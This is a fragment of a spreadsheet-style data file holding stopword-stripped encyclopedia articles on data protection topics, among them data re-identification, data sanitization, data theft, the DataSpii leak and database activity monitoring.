standards, "deemed adequate" purposes article personal information sent organisations without sender breach article national equivalents. safe harbor approved providing adequate protection personal data, purposes article 25(6), european commission july 2000.under safe harbor, adoptee organisations need carefully consider compliance onward transfer obligations, personal data originating transferred safe harbor, onward third country. alternative compliance approach "binding corporate rules", recommended many privacy regulators, resolves issue. addition, dispute arising relation transfer data safe harbor must heard panel privacy regulators.in july 2007, new, controversial, passenger name record agreement made. short time afterwards, bush administration gave exemption department homeland security, arrival departure information system (adis) automated target system 1974 privacy act.in february 2008, jonathan faull, head eu's commission home affairs, complained bilateral policy concerning pnr. signed february 2008 memorandum understanding (mou) czech republic exchange visa waiver scheme, without concerting brussels. tensions washington brussels mainly caused lesser level data protection especially since foreigners benefit privacy 1974. other countries approached bilateral included united kingdom, estonia, germany greece. also computer science specific organisations scholars working field references further reading philip agre; marc rotenberg (1998). technology privacy: landscape. press. isbn 978-0-262-51101-8. external links internationalfactsheet ecthr case data protection international conference data protection privacy commissioners biometrics institute privacy chartereuropeeu data protection page unesco chair data privacy european data protection supervisorlatin americalatin american data protection reviewnorth americaprivacy access council canada laboratory international data privacy carnegie mellon university. privacy laws statejournalsieee security privacy magazine transactions data privacy</t>
  </si>
  <si>
    <t>Data re-identification</t>
  </si>
  <si>
    <t>data re-identification de-anonymization practice matching anonymous data (also known de-identified data) publicly available information, auxiliary data, order discover individual data belong. this concern companies privacy policies, health care providers, financial institutions release data collect data gone de-identification process. de-identification process involves masking, generalizing deleting direct indirect identifiers; definition process universal. information public domain, even seemingly anonymized, thus re-identified combination pieces available data basic computer science techniques. protection human subjects ('common rule#signatories'), collection multiple u.s. federal agencies departments including u.s. department health human services, speculate re-identification becoming gradually easier "big data"—the abundance constant collection analysis information along evolution technologies advances algorithms. however, others claimed de-identification safe effective data liberation tool view re-identification concern.more data becoming publicly available internet. these data released applying anonymization techniques like removing personally identifiable information (pii) names, addresses social security numbers ensure sources' privacy. this assurance privacy allows government legally share limited data sets third parties without requiring written permission. such data proved valuable researchers, particularly health care. risk re-identification significantly reduced gdpr-compliant pseudonymization requires data cannot attributed specific data subject without separately kept "additional information". gdpr compliant pseudonymized data embodies state data protection design default requires protection direct indirect identifiers (not direct). gdpr data protection design default principles embodied pseudonymization require protection direct indirect identifiers personal data cross-referenceable re-identifiable) mosaic effect without access "additional information" kept separately controller. because access separately kept "additional information" required re-identification, attribution data specific data subject limited controller support lawful purposes only. legal protections data united states existing privacy regulations typically protect information modified, data deemed anonymized, de-identified. financial information, federal trade commission permits circulation de-identified aggregated. gramm leach bliley (glba), mandates financial institutions give consumers opportunity information shared third parties, cover de-identified data information aggregate contain personal identifiers, since data treated personally identifiable information. educational records terms university records, authorities state federal level shown awareness issues privacy education distaste institutions' disclosure information. u.s. department education provided guidance data discourse identification, instructing educational institutions sensitive risk re-identification anonymous data cross-referencing auxiliary data, minimize amount data public domain decreasing publication directory information students institutional personnel, consistent processes de-identification. medical records medical information patients becoming increasingly available internet, free publicly accessing platforms healthdata.gov patientslikeme, encouraged government open data policies data sharing initiatives spearheaded private sector. while level accessibility yields many benefits, concerns regarding discrimination privacy raised. protections medical records consumer data pharmacies stronger compared kinds consumer data. health insurance portability accountability (hipaa) protects privacy identifiable data health, authorize information release third parties de-identified. addition, mandates patients receive breach notifications probability patient's information inappropriately disclosed utilized without sufficient mitigation harm her. likelihood re-identification factor determining probability patient's information compromised. commonly, pharmacies sell de-identified information data mining companies sell pharmaceutical companies turn.there state laws enacted data mining medical information, struck federal courts maine hampshire first amendment grounds. another federal court another case used "illusive" describe concerns privacy patients recognize risks re-identification. biospecimen notice proposed rule making, published common rule agencies september 2015, expanded umbrella term "human subject" research include biospecimens, materials taken human body blood, urine, tissue etc. this mandates researchers using biospecimens must follow stricter requirements research human subjects. rationale increased risk re-identification biospecimen. final revisions affirmed regulation. re-identification efforts there sizable amount successful attempts re-identification different fields. even easy person break anonymity, steps disclosed learnt, need higher level knowledge access information database. sometimes, technical expertise even needed population unique combination identifiers. health records 1990s, government agency massachusetts called group insurance commission (gic), purchased health insurance employees state, decided release records hospital visits researcher requested data, cost. assured patient's privacy concern since removed identifiers name, addresses, social security numbers. however, information codes, birth date remained untouched. assurance reinforced governor massachusetts, william weld. latanya sweeney, graduate student time, mind picking governor's records data. combining data voter database city cambridge, purchased dollars, governor weld's record discovered ease.in 1997, researcher successfully de-anonymized medical records using voter databases.in 2001, professor latanya sweeney used anonymized hospital visit records voting records state washington successfully matched individual persons time.there existing algorithms used re-identify patient prescription drug information. consumer habits practices researchers university texas, arvind narayanan professor vitaly shmatikov, able re-identify portion anonymized netflix movie-ranking data individual consumers streaming website. data released netflix 2006 de-identification, consisted replacing individual names random numbers moving around personal details. researchers de-anonymized data comparing non-anonymous imdb (internet movie database) users' movie ratings. very little information database, found, needed identify subscriber. resulting research paper, startling revelations easy re-identify netflix users. example, simply knowing data movies user reviewed, including precise rating date rating give take three days allows re-identification success.in 2006, published users' search queries, data anonymized prior public release, york times reporters successfully carried re-identification individuals taking groups searches made anonymized users. attempted suppress identifying information, including usernames addresses, replaced unique identification numbers preserve utility data researchers. bloggers, release, pored data, either trying identify specific users content, point entertaining, depressing, shocking search queries, examples include "how kill wife", "depression medical leave", "car crash photos." reporters, michael barbaro zeller, able track year widow named thelma arnold recognizing clues identity user 417729 search histories. arnold acknowledged author searches, confirming re-identification possible. location data location data series geographical positions time describe person's whereabouts movements class personal data specifically hard keep anonymous. location shows recurring visits frequently attended places everyday life home, workplace, shopping, healthcare specific sparetime patterns. only removing person's identity location data remove identifiable patterns commuting rhythms, sleeping places, work places. mapping coordinates onto addresses, location data easily re-identified correlated person's private life contexts. streams location information play important role reconstruction personal identifiers smartphone data accessed apps. court decisions 2019, professor kerstin noëlle vokinger jakob mühlematter, researchers university zurich, analyzed cases federal supreme court switzerland assess pharmaceutical companies medical drugs involved legal actions federal office public health (foph) regarding pricing decisions medical drugs. general, involved private parties (such pharmaceutical companies) information would reveal private party (for example, drug names) anonymized swiss judgments. researchers able re-identify relevant anonymized cases federal supreme court switzerland linking information publicly accessible databases. this achievement covered media started debate court cases anonymized. concern consequences 1997, latanya sweeney found study census records percent u.s. population identified using combination 5-digit code, gender, date birth. others think re-identification serious threat; claim since combination code, date birth gender rare partially complete, year month birth without date, county name instead specific code, risk re-identification reduced many instances.unauthorized re-identification basis combinations require access separately kept "additional information" control data controller, required gdpr compliant pseudonymization. individuals whose data re-identified also risk information, identity attached sold organizations want possessing private information finances, health preferences. release data cause anxiety, shame embarrassment. once individual's privacy breached result re-identification, future breaches become much easier: link made piece data person's real identity, association data anonymous identity breaks anonymity person.re-identification expose companies pledged assure anonymity increased liability contract tort cause violate privacy policies released information third parties identify users re-identification. violate internal policies, institutions also violate state federal laws, laws concerning financial confidentiality medical privacy. remedies address risks re-identification, several proposals suggested: higher standards uniform definition de-identification retaining data utility: definition de-identification balance privacy protections reduce re-identification risk refusal companies delete data heightened privacy protections anonymized information tighter security databases store anonymized information strong malicious re-identification, passing broader anti-discrimination privacy legislation ensures privacy protections well encourage participation data sharing projects endeavors, well establishment uniform data protection standards academic communities, scientific community, order minimize privacy violations creation data-release policies: making sure de-identification rhetoric accurate, drawing contracts prohibit re-identification attempts dissemination sensitive information, establishing data enclaves, utilizing data-based strategies match required protection standards level risk. implementation differential privacy requested data sets generation synthetic data exhibits statistical properties data, without allowing real individuals identifiedwhile complete re-identification urged, enforcement would difficult. there are, however, ways lawmakers combat punish re-identification efforts, exposed: pair harsher penalties stronger enforcement federal trade commission federal bureau investigation; grant victims re-identification right action re-identify them; mandate software audit trails people utilize analyze anonymized data. small-scale re-identification also imposed trusted recipients particular databases, government data miners researchers. this would much easier enforce discourage re-identification. examples de-anonymization "researchers université catholique louvain, belgium, analyzed data million cellphone users small european country span months found four points reference, fairly spatial temporal resolution, enough uniquely identify percent them. words, extract complete location information single person "anonymized" data million people, would need place within couple hundred yards cellphone transmitter, sometime course hour, four times year. twitter posts would probably provide information needed, contained specific information person's whereabouts." "here, report surnames recovered personal genomes profiling short tandem repeats chromosome (y-strs) querying recreational genetic genealogy databases. show combination surname types metadata, state, used triangulate identity target." also de-identification doxing k-anonymity statistical disclosure control protected health information references</t>
  </si>
  <si>
    <t>Multi-party authorization</t>
  </si>
  <si>
    <t>multi-party authorization (mpa) process protect telecommunications network, data center industrial control system undesirable acts malicious insider inexperienced technician acting alone. requires second authorized user approve action allowed take place. this pro-actively protects data systems undesirable act. architecture existing methods protect data systems malicious insider include auditing, rotation separation duties. auditing reactive method meant discover fact. rotation separation duties limiting techniques meant minimize prolonged access sensitive data systems order limit undesirable acts. contrast, pro-active solution. advantage methods protect undesirable acts malicious insider inexperienced operator pro-active prevents data systems compromise single entity acting alone. prevents initial undesirable rather dealing breach compromise fact. application multi-party authorization technology secure vulnerable sensitive activities data sources attack compromised insider acting alone. somewhat analogous weapons systems require individuals turn different keys order enable system. person cannot alone. another example consider access lock bank. that access requires multiple parties, lock owner another bank official. both individuals together access lock box, neither could alone. mpa, like manner, ensures second eyes reviews approves activity involving critical sensitive data systems action takes place. multi-party authorization suitable wide variety applications. implemented protect type sensitive data electronic form activity within network infrastructure computerized control system. electronic health record example data record could protected mpa. multi-party authorization provides pro-active protection undesirable acts inexperienced technician malicious insider. references patent 7,519,826, issued: april 2009 "near real time multi-party task authorization access control" further reading businessedge, 2009 "protecting from malicious insider: multi party authorization"</t>
  </si>
  <si>
    <t>Rights Object Acquisition Protocol</t>
  </si>
  <si>
    <t>rights object acquisition protocol suite xml-based digital rights management (drm) security protocols enables open mobile alliance-conformant user devices request acquire viewing and/or editing rights, permissions, privileges attributes rights issuer. this protocol specified specification v2.0. roap protocol suite enables communication rights issuing (ri) entity agent resident user device. rights, permissions, privileges attributes encapsulated object oriented (oo) entities called rights objects (ro).the basic functionalities enabled roap include: registration user devices (4-pass registration protocol) request acquisition (2-pass rights object acquisition protocol, 1-pass roap) joining leaving domain (2-pass join domain protocol, 2-pass leave domain protocol)all protocols included roap protocol suite except 1-pass roap initialized user device receives roap trigger document. mime type roap trigger document "application/vnd.oma.drm.roap-trigger+xml". references external links open mobile alliance open mobile alliance digital rights management specification v2.0 introduction basic concepts</t>
  </si>
  <si>
    <t>Data sanitization</t>
  </si>
  <si>
    <t>data sanitization involves secure permanent erasure sensitive data datasets media guarantee residual data recovered even extensive forensic analysis. data sanitization wide range applications mainly used clearing end-of-life electronic devices sharing large datasets contain sensitive information. main strategies erasing personal data devices physical destruction, cryptographic erasure, data erasure. while term data sanitization lead believe includes data electronic media, term also broadly covers physical media, paper copies. these data types termed soft electronic files hard physical media paper copies. data sanitization methods also applied cleaning sensitive data, heuristic-based methods, machine-learning based methods, k-source anonymity.this erasure necessary increasing amount data moving online storage, poses privacy risk situation device resold another individual. importance data sanitization risen recent years private information increasingly stored electronic format larger, complex datasets utilized distribute private information. electronic storage expanded enabled private data stored. therefore requires advanced thorough data sanitization techniques ensure data left device longer use. technological tools enable transfer large amounts data also allow private data shared. especially increasing popularity cloud-based information sharing storage, data sanitization methods ensure data shared cleaned become significant concern. therefore sensible governments private industry create enforce data sanitization policies prevent data loss security incidents. data sanitization policy public private sectors while practice data sanitization common knowledge technical fields, consistently understood across levels business government. thus, need comprehensive data sanitization policy government contracting private industry required order avoid possible loss data, leaking state secrets adversaries, disclosing proprietary technologies, possibly barred contract competition government agencies. with increasingly connected world, become even critical governments, companies, individuals follow specific data sanitization protocols ensure confidentiality information sustained throughout lifecycle. this step critical core information security triad confidentiality, integrity, availability. this triad especially relevant operate government contractors handle sensitive private information. end, government contractors must follow specific data sanitization policies policies enforce national institute standards technology recommended guidelines media sanitization covered nist special publication 800-88. this especially prevalent government work requires (controlled unclassified information) required dfars clause 252.204-7012, safeguarding covered defense information cyber incident reporting while private industry required follow nist 800-88 standards data sanitization, typically considered best practice across industries sensitive data. compound issue, ongoing shortage cyber specialists confusion proper cyber hygiene created skill funding many government contractors. however, failure follow recommended sanitization policies result severe consequences, including losing data, leaking state secrets adversaries, losing proprietary technologies, preventing contract competition government agencies. therefore, government contractor community must ensure data sanitization policies well defined follow nist guidelines data sanitization. additionally, core focus data sanitization seem focus electronic “soft copy” data, data sources “hard copy” documents must addressed sanitization policies. data sanitization trends examine existing instances data sanitization policies determine impacts developing, utilizing, following policy guidelines recommendation, research data coalesced government contracting sector also critical industries defense, energy, transportation. these selected typically also fall government regulations, therefore nist (national institute standards technology) guidelines policies would also apply united states. primary data study performed independent research company coleman parkes research august 2019. this research project targeted many different senior cyber executives policy makers surveying 1,800 senior stakeholders. data coleman parkes shows organizations data sanitization policy place; however, united states, respondents felt policy communicated well across business. additionally, reveals remote contract workers least likely comply data sanitization policies. this trend become pressing issue many government contractors private companies working remotely covid-19 pandemic. likelihood continuing return normal working conditions likely. june 2021, basic google search “data lost non-sanitization” returned million results. these included articles data breaches loss business, military secrets proprietary data losses, (protected health information), (personally identifiable information), many articles performing essential data sanitization. many articles also point existing data sanitization security policies companies government entities, u.s. environmental protection agency, "sample policy guidance language federal media sanitization". based articles nist 800-88 recommendations, depending data security level categorization, data cleared provide basic level data sanitization overwriting data sectors remove previous data remnants basic format would include. again, focus electronic media. this method typically utilized media going re-used within organization similar data security level. purged physical (degaussing) logical methods (sector overwrite) make target media unreadable. typically utilized media longer needed lower level data security level. destroyed permanently renders data irretrievable commonly used media leaving organization reached life, i.e., paper shredding hard drive/media crushing incineration. this method typically utilized media containing highly sensitive information state secrets could cause grave damage national security privacy safety individuals. data sanitization road blocks international information systems security certification consortium 2020 cyber workforce study shows global cybersecurity industry still 3.12 million unfilled positions skills shortage. therefore, correct skillset implement nist 800-88 policies come premium labor rate. addition, staffing funding need adjust meet policy needs properly implement sanitization methods tandem appropriate data level categorization improve data security outcomes reduce data loss. order ensure confidentiality customer client data, government private industry must create follow concrete data sanitization policies align best practices, outlined nist 800-88. without consistent enforced policy requirements, data increased risk compromise. achieve this, entities must allow cybersecurity wage premium attract qualified talent. order prevent loss data therefore proprietary data, personal information, trade secrets, classified information, logical follow best practices. data sanitization policy best practices data sanitization policy must comprehensive include data levels correlating sanitization methods. data sanitization policy created must comprehensive include forms media include soft hard copy data. categories data also defined appropriate sanitization levels defined sanitization policy. this policy defined levels data align appropriate sanitization method. example, controlled unclassified information electronic storage devices cleared purged, devices storing secret secret classified materials physically destroyed. data sanitization policy enforceable show department management structure responsibility ensure data sanitized accordingly. this policy require high-level management champion (typically chief information security officer another c-suite equivalent) process define responsibilities penalties parties levels. this policy champion include defining concepts information system owner information owner define chain responsibility data creation eventual sanitization. ciso policy champion also ensure funding allocated additional cybersecurity workers implement enforce policy compliance. auditing requirements also typically included prove media destruction managed additional staff. small business without broad cyber background resources available form editable data sanitization policy templates. many groups idsc (international data sanitization consortium) provide free charge website https://www.datasanitization.org/. without training data security sanitization principles, unfeasible expect users comply policy. therefore, sanitization policy include matrix instruction frequency category ensure users, every level, understand part complying policy. this task easy accomplish government contractors already required perform annual information security training employees. therefore, additional content added ensure data sanitization policy compliance. sanitizing devices primary data sanitization complete clearing devices destruction sensitive data storage device longer transferred another information system this essential stage data security lifecycle (dsl) information lifecycle management (ilm). both approaches ensuring privacy data management throughout usage electronic device, ensures data destroyed unrecoverable devices reach lifecycle.there three main methods data sanitization complete erasure data: physical destruction, cryptographic erasure, data erasure. three erasure methods ensure deleted data cannot accessed even advanced forensic methods, maintains privacy individuals’ data even mobile device longer use. physical destruction physical erasure involves manual destruction stored data. this method uses mechanical shredders degaussers shred devices, phones, computers, hard drives, printers, small individual pieces. varying levels data security levels require different levels destruction. degaussing commonly used hard disk drives (hdds), involves utilization high energy magnetic fields permanently disrupt functionality memory storage device. when data exposed strong magnetic field, memory storage neutralized recovered used again. degaussing apply solid state disks (ssds) data stored using magnetic methods. when particularly sensitive data involved typical utilize processes paper pulp, special burn, solid state conversion. this ensure proper destruction sensitive media including paper, hard soft copy media, optical media, specialized computing hardware. physical destruction often ensures data completely erased cannot used again. however, physical byproducts mechanical waste mechanical shredding damaging environment, recent trend increasing amount e-waste material recovered e-cycling helped minimize environmental impact. furthermore, data physically destroyed, longer resold used again. cryptographic erasure cryptographic erasure involves destruction secure passphrase, used protect stored information. data encryption involves development secure enables authorized parties gain access data stored. permanent erasure ensures private data stored longer accessed. cryptographic erasure commonly installed manufactures device encryption software often built device. encryption erasure involves encrypting sensitive material requires secure decrypt information needs used. when information needs deleted, secure erased. this provides greater ease use, speedier data wipe, software methods involves deletion secure information rather individual file.cryptographic erasure often used data storage contain much private information since possibility errors occur manufacturing failures human error process destruction. this creates wider range possible results data erasure. this method allows data continue stored device require device completely erased. this way, device resold another individual company since physical integrity device maintained. however assumes level data encryption device resistant future encryption attacks. instance hard drive utilizing cryptographic erasure 128bit secure years, common break level encryption. therefore level data security declared data sanitization policy future proof process. data erasure process data erasure involves masking information byte level insertion random sectors electronic equipment longer use. this software based method ensures data previous stored completely hidden unrecoverable, ensures full data sanitization. efficacy accuracy sanitization method also analyzed auditable reports.data erasure often ensures complete sanitization also maintaining physical integrity electronic equipment technology resold reused. this ability recycle technological devices makes data erasure environmentally sound version data sanitization. this method also accurate comprehensive since efficacy data masking tested afterwards ensure complete deletion. however, data erasure software based mechanisms requires time compared methods. necessity data sanitization there increased usage mobile devices, internet things (iot) technologies, cloud-based storage systems, portable electronic devices, various electronic methods store sensitive information, therefore implementing effective erasure methods device longer become crucial protect sensitive data. increased usage electronic devices general increased storage private information electronic devices, need data sanitization much urgent recent years.there also specific methods sanitization fully clean devices private data prove problematic. example, remote wiping methods mobile devices vulnerable outside attacks efficacy depends unique efficacy individual software system installed. remote wiping involves sending wireless command device lost stolen directs device completely wipe data. while method beneficial, also several drawbacks. example, remote wiping method manipulated attackers signal process necessary. this results incomplete data sanitization. attackers gain access storage device, user risks exposing private information stored. cloud computing storage become increasingly popular method data storage transfer. however, certain privacy challenges associated cloud computing fully explored. cloud computing vulnerable various attacks code injection, path traversal attack, resource depletion shared pool structure techniques. these cloud storage models require specific data sanitization methods combat issues. data properly removed cloud storage models, opens possibility security breaches multiple levels. risks posed inadequate data-set sanitization inadequate data sanitization methods result main problems: breach private information compromises integrity original dataset. data sanitization methods unsuccessful removing sensitive information, poses risk leaking information attackers. numerous studies conducted optimize ways preserving sensitive information. some data sanitization methods high sensitivity distinct points closeness data points. this type data sanitization precise detect anomalies even poisoned data point relatively close true data. another method data sanitization also removes outliers data, general way. detects general trend data discards data strays it’s able target anomalies even inserted group. general, data sanitization techniques algorithms detect anomalies remove suspicious points poisoned data sensitive information. furthermore, data sanitization methods remove useful, non-sensitive information, renders sanitized dataset less useful altered original. there iterations common data sanitization techniques attempt correct issue loss original dataset integrity. particular, liu, xuan, wen, song offered algorithm data sanitization called improved minimum sensitive itemsets conflict first algorithm (imsicf) method. there often emphasis protecting privacy users, method brings perspective focuses also protecting integrity data. functions three main advantages: learns optimize process sanitization cleaning item highest conflict count, keeps parts dataset highest utility, also analyzes conflict degree sensitive material. robust research conducted efficacy usefulness technique reveal ways benefit maintaining integrity dataset. this technique able firstly pinpoint specific parts dataset possibly poisoned data also computer algorithms make calculation tradeoffs useful decide removed. this data sanitization takes account utility data immediately discarded. applications data sanitization data sanitization methods also implemented privacy preserving data mining, association rule hiding, blockchain-based secure information sharing. these methods involve transfer analysis large datasets contain private information. this private information needs sanitized made available online sensitive material exposed. data sanitization used ensure privacy maintained dataset, even analyzed. privacy preserving data mining privacy preserving data mining (ppdm) process data mining maintaining privacy sensitive material. data mining involves analyzing large datasets gain information draw conclusions. ppdm wide range uses integral step transfer large data containing sensitive material. data sanitization integral step privacy preserving data mining private datasets need sanitized utilized individuals companies analysis. privacy preserving data mining ensure private information cannot leaked accessed attackers sensitive data traceable individuals submitted data. privacy preserving data mining aims maintain level privacy individuals also maintaining integrity functionality original dataset. order dataset used, necessary aspects original data need protected process data sanitization. this balance privacy utility primary goal data sanitization methods.one approach achieve optimization privacy utility encrypting decrypting sensitive information using process called generation. after data sanitized, generation used ensure data secure cannot tampered with. approaches rider optimization algorithm (roa), also called randomized (rroa) generation strategies find optimal data transferred without leaking sensitive information.some versions generation also optimized larger datasets. example, novel, method-based privacy preserving distributed data mining strategy able increase privacy hide sensitive material generation. this version sanitization allows large amount material sanitized. companies seeking share information several different groups, methodology preferred original methods take much longer process.certain models data sanitization delete information original database effort preserve privacy subject. these heuristic based algorithms beginning become popularized, especially field association rule mining. heuristic methods involve specific algorithms pattern hiding, rule hiding, sequence hiding keep specific information hidden. this type data hiding used cover wide patterns data, effective specific information protection. heuristic based methods suited sanitizing large datasets, however, recent developments heuristics based field analyzed ways tackle problem. example includes mr-ovntsa approach, heuristics based sensitive pattern hiding approach data, introduced shivani sharma durga toshniwa. this approach uses heuristics based method called ‘mapreduce based optimum victim item transaction selection approach’, also called mr-ovntsa, aims reduce loss important data removing hiding sensitive information. takes advantage algorithms compare steps optimize sanitization.an important goal ppdm strike balance maintaining privacy users submitted data also enabling developers make full dataset. many measures ppdm directly modify dataset create version makes original unrecoverable. strictly erases sensitive information makes inaccessible attackers. association rule mining type data sanitization rule based ppdm, uses defined computer algorithms clean datasets. association rule hiding process data sanitization applied transactional databases. transactional databases general term data storage used record transactions organizations conduct business. examples include shipping payments, credit card payments, sales orders. this source analyzes fifty four different methods data sanitization presents four major findings trends certain methods data sanitization rely machine deep learning. there various weaknesses current data sanitization. many methods intricate detailed enough protect specific data attacks. this effort maintain privacy dating important data referred privacy-preserving data mining. machine learning develops methods adapted different types attacks learn face broader range situations. deep learning able simplify data sanitization methods protective measures efficient less time consuming way. there also hybrid models utilize rule based machine deep learning methods achieve balance techniques. blockchain-based secure information sharing browser backed cloud storage systems heavily reliant data sanitization becoming increasingly popular route data storage. furthermore, ease usage important enterprises workplaces cloud storage communication collaboration.blockchain used record transfer information secure data sanitization techniques required ensure data transferred securely accurately. it’s especially applicable working supply chain management useful looking optimize supply chain process. example, whale optimization algorithm (woa), uses method secure generation ensure information shared securely blockchain technique. need improve blockchain methods becoming increasingly relevant global level development increases becomes electronically dependent. industry specific applications healthcare healthcare industry important sector relies heavily data mining datasets store confidential information patients. electronic storage also increasing recent years, requires comprehensive research understanding risks pose. currently, data mining storage techniques able store limited amounts information. this reduces efficacy data storage increases costs storing data. advanced methods storing mining data involve cloud based systems becoming increasingly popular able mine store larger amounts information. references</t>
  </si>
  <si>
    <t>Data theft</t>
  </si>
  <si>
    <t>data theft growing phenomenon primarily caused system administrators office workers access technology database servers, desktop computers growing list hand-held devices capable storing digital information, flash drives, ipods even digital cameras. since employees often spend considerable amount time developing contacts, confidential, copyrighted information company work for, feel right information inclined copy and/or delete part leave company, misuse still employment. information sold bought used criminals criminal organizations. alternatively, employee choose deliberately abuse trusted access information purpose exposing misconduct employer. from perspective society, whistleblowing seen positive protected certain situations jurisdictions, usa. common scenario sales person makes copy contact database next job. typically, clear violation terms employment. notable acts data theft include leaker chelsea manning self-proclaimed whistleblowers edward snowden hervé falciani. data theft methods phrase data theft actually misnomer, since unlike theft typical data theft methods typically deprive owner data, rather create additional, unauthorized copy. thumbsucking thumbsucking, similar podslurping, intentional undeliberate portable mass storage device, flash drive "thumbdrive"), illicitly download confidential data network endpoint.a flash drive allegedly used remove without authorization highly classified documents design u.s. nuclear weapons vault alamos.the threat thumbsucking amplified number reasons, including following: storage capacity portable storage devices increased. cost high-capacity portable storage devices decreased. networks grown dispersed, number remote network access points increased methods network connection expanded, increasing number vectors network infiltration. data leakage data leak part insider attack accidental unintentional data loss specific circuit stances. investigating data theft techniques investigate data theft include stochastic forensics, digital artifact analysis (especially drive artifacts), computer forensics techniques. terminology countries term incorrect considered theft thing (material object) information thing. also slurping bluesnarfing sneakernet data breach references external links usbs' giant sucking sound readers weigh ipod threat scapegoat? online behaviours lead data theft</t>
  </si>
  <si>
    <t>Data-centric security</t>
  </si>
  <si>
    <t>data-centric security approach security emphasizes dependability data rather security networks, servers, applications. data-centric security evolving rapidly enterprises increasingly rely digital information business data projects become mainstream. data-centric security also allows organizations overcome disconnect security technology objectives business strategy relating security services directly data implicitly protect; relationship often obscured presentation security itself. concepts common processes data-centric security model include: discover: ability know data stored including sensitive information. manage: ability define access policies determine certain data accessible, editable, blocked specific users, locations. protect: ability defend data loss unauthorized data prevent sensitive data sent unauthorized users locations. monitor: constant monitoring data usage identify meaningful deviations normal behavior would point possible malicious intent.from technical point view, information (data)-centric security relies implementation following: information (data) self-describing defending. policies controls account business context. information remains protected moves applications storage systems, changing business context. policies work consistently different data management technologies defensive layers implemented. technology data access controls policies data access control selective restriction access data. accessing mean viewing, editing, using. defining proper access controls requires information, resides, important important sensitive data designing appropriate controls. encryption encryption proven data-centric technique address risk data theft smartphones, laptops, desktops even servers, including cloud. limitation encryption always effective network intrusion occurred cybercriminals operate stolen valid user credentials. data masking data masking process hiding specific data within database table cell ensure data security maintained sensitive information exposed unauthorized personnel. this include masking data users, developers, third-party outsourcing vendors, etc. data masking achieved multiple ways: duplicating data eliminate subset data needs hidden, obscuring data dynamically users perform requests. auditing monitoring activity data layer component data-centric security strategy. provides visibility types actions users tools requested authorized specific data elements. continuous monitoring data layer combined precise access control contribute significantly real-time detection data breaches, limits damages inflicted breach even stop intrusion proper controls place. 2016 survey shows organizations still assess database activity continuously lack capability identify database breaches timely fashion. privacy-enhancing technologies privacy-enhancing technology (pet) method protecting data. pets allow online users protect privacy personally identifiable information (pii) provided handled services applications. pets techniques minimize possession personal data without losing functionality information system. cloud computing cloud computing evolving paradigm tremendous momentum, unique aspects exacerbate security privacy challenges. heterogeneity diversity cloud services environments demand fine-grained access control policies services flexible enough capture dynamic, context, attribute-based access requirements data protection. also data masking data security defense depth (computing) information security information security policies raz-lee references</t>
  </si>
  <si>
    <t>DataSpii</t>
  </si>
  <si>
    <t>dataspii (pronounced data-spy) leak directly compromised private data many million chrome firefox users least eight browser extensions. eight browser extensions included hover zoom, speakit!, superzoom, savefrom.net helper, fairshare unlock, panelmeasurement, branded surveys, panel community surveys. private data included personally identifiable information (pii), corporate information (ci), government information (gi). dataspii impacted pentagon, zoom, bank america, sony, kaiser permanente, apple, facebook, microsoft, amazon, symantec, fireeye, trend micro, boeing, spacex, palo alto networks. highly sensitive information (e.g., private network topology) associated corporations agencies intercepted sent foreign-owned entities.the data made publicly available nacho analytics (na), marketing intelligence company described "god mode internet." both paid free-trial members provided access leaked data. upon signing membership, members provided access data google analytics account. dataspii leaked un-redacted information related medical records, returns, location, travel itinerary, genealogy, usernames, passwords, credit cards, genetic profiles, company memos, employee tasks, keys, proprietary source code, environment, firewall access codes, proprietary secrets, operational materials, zero-day vulnerabilities.dataspii discovered elucidated cybersecurity researcher jadali. requesting data single domain service, jadali able observe staff members thousands companies working near real-time. website stated collected data millions opt-in users. jadali, along journalists technica washington post, interviewed impacted users, including individuals major corporations. according interviews, impacted users consent collection. references</t>
  </si>
  <si>
    <t>Database activity monitoring</t>
  </si>
  <si>
    <t>database activity monitoring (dam, a.k.a. enterprise database auditing real-time protection) database security technology monitoring analyzing database activity. combine data network-based monitoring native audit information provide comprehensive picture database activity. data gathered used analyze report database activity, support breach investigations, alert anomalies. typically performed continuously real-time. database activity monitoring prevention (damp) extension goes beyond monitoring alerting also block unauthorized activities. helps businesses address regulatory compliance mandates like payment card industry data security standard (pci dss), health insurance portability accountability (hipaa), sarbanes-oxley (sox), u.s. government regulations nist 800-53, regulations. also important technology protecting sensitive databases external attacks cybercriminals. according 2009 verizon business’ data breach investigations report—based data analyzed verizon business’ caseload confirmed breaches involving million compromised records 2008—75 percent breached records came compromised database servers. according gartner, “dam provides privileged user application access monitoring independent native database logging audit functions. function compensating control privileged user separation-of-duties issues monitoring administrator activity. technology also improves database security detecting unusual database read update activity application layer. database event aggregation, correlation reporting provide database audit capability without need enable native database audit functions (which become resource-intensive level auditing increased).”according survey independent oracle user group (ioug), “most organizations mechanisms place prevent database administrators privileged database users reading tampering sensitive information financial, business applications. most still unable even detect breaches incidents.” forrester refers category “database auditing real-time protection”. common cases privileged user monitoring: monitoring privileged users superusers), database administrators (dbas), systems administrators sysadmins), developers, help desk, outsourced personnel typically unfettered access corporate databases essential protecting external internal threats. privileged user monitoring includes auditing activities transactions; identifying anomalous activities (such viewing sensitive data, creating accounts superuser privileges); reconciling observed activities (such adding deleting tables) authorized change requests. since organizations already protected perimeter level, indeed major concern lies need monitor protect privileged users. there high correlation therefore database security need protect insider threat. this complex task privileged users capable using sophisticated techniques attack database stored procedures, triggers, views obfuscated traffic attacks difficult detect using traditional methods. addition, since targeted attacks frequently result attackers gaining privileged user credentials, monitoring privileged activities also effective identify compromised systems. result, auditors demanding monitoring privileged users security best practices well wide range regulations. privileged user monitoring helps ensure: data privacy, authorized applications users viewing sensitive data. data governance, critical database structures values changed outside corporate change control procedures. application activity monitoring: primary purpose application activity monitoring provide greater level end-user accountability detect fraud (and abuses legitimate access) occurs enterprise applications, rather direct access database. multi-tier enterprise applications oracle ebs, peoplesoft, edwards, sap, siebel systems, business intelligence, custom applications built standard middle-tier servers websphere oracle weblogic server mask identity end-users database transaction level. this done optimization mechanism known “connection pooling.” using pooled connections, application aggregates user traffic within database connections identified generic service account name. application activity monitoring allows organizations associate specific database transactions particular application end-users, order identify unauthorized suspicious activities. end-user accountability often required data governance requirements sarbanes–oxley act. auditor guidance public company accounting oversight board compliance also increased emphasis anti-fraud controls. cyberattack protection: injection type attack used exploit coding practices applications relational databases. attacker uses application send statement composed application statement concatenated additional statement attacker introduces.many application developers compose statements concatenating strings prepared statement; case application susceptible injection attack. technique transforms application statement innocent call malicious call cause unauthorized access, deletion data, theft information.one prevent injection monitoring application activity, generating baseline “normal behavior”, identifying attack based divergence normal structures normal sequences. alternative approaches monitor memory database, database execution plan context statements visible, based policy provide 